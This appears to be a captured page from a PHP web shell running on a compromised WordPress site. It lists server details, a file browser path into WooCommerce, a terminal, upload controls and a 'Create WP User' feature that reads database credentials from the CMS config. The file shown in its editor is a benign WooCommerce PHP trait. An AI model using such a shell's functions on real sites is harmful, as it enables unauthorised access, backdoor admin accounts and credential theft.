Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.125
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
lib
/
packages
/
Sabberworm
/
CSS
/
Position
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
Position.php
1.42 KB
-rw-r--r--
2026-03-03 00:17
Positionable.php
1.20 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
Position.php
<?php declare(strict_types=1); namespace Automattic\WooCommerce\Vendor\Sabberworm\CSS\Position; /** * Provides a standard reusable implementation of `Positionable`. * * @internal * * @phpstan-require-implements Positionable */ trait Position { /** * @var int<1, max>|null */ protected $lineNumber; /** * @var int<0, max>|null */ protected $columnNumber; /** * @return int<1, max>|null */ public function getLineNumber() { return $this->lineNumber; } /** * @return int<0, max> */ public function getLineNo() { $lineNumber = $this->getLineNumber(); return $lineNumber !== null ? $lineNumber : 0; } /** * @return int<0, max>|null */ public function getColumnNumber() { return $this->columnNumber; } /** * @return int<0, max> */ public function getColNo() { $columnNumber = $this->getColumnNumber(); return $columnNumber !== null ? $columnNumber : 0; } /** * @param int<0, max>|null $lineNumber * @param int<0, max>|null $columnNumber */ public function setPosition($lineNumber, $columnNumber = null) { // The conditional is for backwards compatibility (backcompat); `0` will not be allowed in future. $this->lineNumber = $lineNumber !== 0 ? $lineNumber : null; $this->columnNumber = $columnNumber; } }
关闭
保存